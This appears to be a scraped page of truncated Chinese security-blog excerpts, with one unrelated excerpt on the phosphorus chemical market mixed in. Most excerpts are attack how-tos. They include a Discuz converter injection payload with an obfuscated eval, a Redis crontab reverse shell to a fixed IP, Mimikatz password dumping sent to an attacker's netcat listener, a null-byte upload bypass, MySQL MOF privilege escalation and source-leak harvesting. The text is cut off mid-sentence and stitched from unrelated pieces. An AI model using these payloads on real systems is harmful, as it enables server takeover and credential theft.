Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。 提供的功能包括: 1:创建,修改,删除索引/外键/视图/存储过程和函数。 2:查询,合计,排序数据。 3:新增/修改/删除记录。 4:支持所有数据类型,包括大字段。 5:能够批量执行SQL语句。 6:支持将数据,表结构,视图导成SQL或CSV。 7:能够外键关联打印数据库概要。 8:能够查看进程和关闭进程。 9:能够查看用户...
有些论坛 可能路径放在其它目录 没有utility 直接convert等 如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功 http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0 post提交: a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.C...
漏洞细节: 这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。 例子: move_uploaded_file ( string $filename , string $destination ) 这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。 我这里用DVWA来演示这个例子,DVWA级别最...
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指...
此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。 描述 该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。 同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。 需要注意的是,此工具首先会假定目标系统存...
Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。 例子: <span>$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0 Kernel local: 3.0.0 Possible Exploits: [+] semtex CVE-2013-2094 Source: www.exploit-db.com/download/25444/ [+] memodipper CVE-2012-0056 Source: http://www.exploit-db.com/exploits/18411/ [+] perf_swevent CVE-2...
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面; 测试环境:CentOS,RHEL # 利用crontab反弹shell redis-cli flushall echo -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1nn"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save # 利用crontab创建文件 /tmp/888 redis-cli flushall # 为了方便...
1.记录 Mimikatz输出: C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器: Attacker执行: E:>nc -lvp 4444 Victim执行: C:>mimikatz.exe ""privilege::debug"" ""se...
磷化工产业链,从上游磷矿到下游草甘膦,近期有一些新事件在重塑产业供求预期。 一方面,上游磷矿减产预期有所升温。6月4日,四川乐山市一磷矿附近发生山体滑坡,考虑到全国正处于主汛期,后续强降雨、山洪、滑坡以及泥石流等地质灾害将对采矿业安全性造成影响,四川锂矿主动减产意愿增加。 同时2023年成都大运会将在2023年8月11日至8月27日期间举办,四川已明确要求在7月21日-8月13日期间进行环保管控工作,磷化工是高耗能高污染行业,预计将受到重点管控,行业产量预计阶段性下降。若四川磷矿短期减产,或对国内磷化工的供给造成一...
星外虚拟主机跨目录读取文件漏洞,需要一定条件。 详细说明: 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:windows7i24IISLOG.exe c:windows7i24IISLOG2.exe c:windows7i24IISLOG3.exe c:windows7i24IISLOG4.exe c:windows7i24tool.exe c:windowsrsb.exe 其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录: 在 webshell中 CmdPath: c:windows7i24IISLOG Argument: “select top 100 path from e:host*.*”...
背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http://www.example.com/.hg/ 漏洞利用: 工具: dvcs-ripper rip-hg.pl -v -u http://www.example.com/.hg/ .git源码泄漏 漏洞成因: 在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了。使用这个文件,可以用来恢复源代码。 e.g. http://www.example.com/.git/config 漏...
